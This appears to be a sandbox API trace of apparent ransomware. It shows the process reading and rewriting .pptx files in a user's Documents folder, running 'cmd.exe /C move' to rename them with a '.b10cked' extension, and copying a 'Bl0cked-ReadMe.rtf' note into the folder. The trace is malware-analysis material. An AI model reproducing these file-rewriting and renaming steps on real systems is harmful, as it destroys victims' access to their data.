SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8bd5 [0234.131] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.131] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=29092054304) returned 1 [0234.131] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.131] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8bd5 
[0234.131] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.131] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8bd5 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x8bd5 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8bd5 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8bd5 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8bd5 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8bd5 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8bd5 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.133] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8bd5 [0234.133] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.133] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x86ed [0234.133] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0234.134] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0234.134] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0234.134] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x8bd5 [0234.134] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0234.134] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0234.134] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0234.134] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x8bd5 [0234.134] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0234.134] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0234.134] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x45e9, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x45e9, lpOverlapped=0x0) returned 1 [0234.134] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0234.134] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x45e9, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x45e9, lpOverlapped=0x0) returned 1 [0234.134] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-17897, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x45ec [0234.134] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x45e9, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x45e9, lpOverlapped=0x0) returned 1 [0234.135] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-17897, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x45ec [0234.135] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x45e9, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x45e9, lpOverlapped=0x0) returned 1 [0234.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fUt5wrAPeTu.pptx", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0234.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 
lpWideCharStr="fUt5wrAPeTu.pptx", cchWideChar=16, lpMultiByteStr=0x1328744, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fUt5wrAPeTu.pptx", lpUsedDefaultChar=0x0) returned 16 [0234.139] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x8bd5 [0234.139] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0234.139] CloseHandle (hObject=0x1b4) returned 1 [0234.140] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fUt5wrAPeTu.pptx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FUT5WR~1.PPT") returned 0x26 [0234.140] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0234.140] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FUT5WR~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FUT5WR~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, 
dwProcessId=0xa64, dwThreadId=0xf08)) returned 1 [0234.146] CloseHandle (hObject=0x120) returned 1 [0234.146] CloseHandle (hObject=0x1b4) returned 1 [0234.146] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0234.146] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0234.146] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount2=47) returned 1 [0234.146] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0234.146] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0234.146] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0234.146] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0234.146] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0234.146] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0234.146] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0234.146] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: 
lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0234.146] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0234.146] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xb04, dwThreadId=0xb20)) returned 1 [0234.157] CloseHandle (hObject=0x120) returned 1 [0234.157] CloseHandle (hObject=0x1b4) returned 1 [0234.157] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\bl0cked-readme.rtf")) returned 0x20 [0234.157] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0234.157] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0234.158] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0234.158] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0234.158] ReleaseMutex (hMutex=0xf8) returned 1 [0234.158] WaitForSingleObject (hHandle=0xf8, 
dwMilliseconds=0xffffffff) returned 0x0 [0234.158] ReleaseMutex (hMutex=0xf8) returned 1 [0234.158] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0234.158] ReleaseMutex (hMutex=0xf8) returned 1 [0234.158] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0234.158] ReleaseMutex (hMutex=0xf8) returned 1 [0234.158] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\kC6z.pptx" (normalized: "c:\\users\\eebsym5\\documents\\kc6z.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0234.158] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.158] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2932 [0234.158] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.158] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=29094761691) returned 1 [0234.158] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.158] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2932 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.159] SetFilePointer (in: 
hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2932 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x2932 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2932 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2932 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 
[0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2932 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.159] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.160] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2932 [0234.160] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.160] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.160] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2932 [0234.160] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.160] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.160] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2932 [0234.160] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.160] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ecec*=0) returned 0x244a [0234.160] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0234.161] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0234.161] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0234.161] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x2932 [0234.161] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0234.161] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0234.161] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0234.161] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x2932 [0234.161] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0234.162] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0234.162] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1498, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1498, 
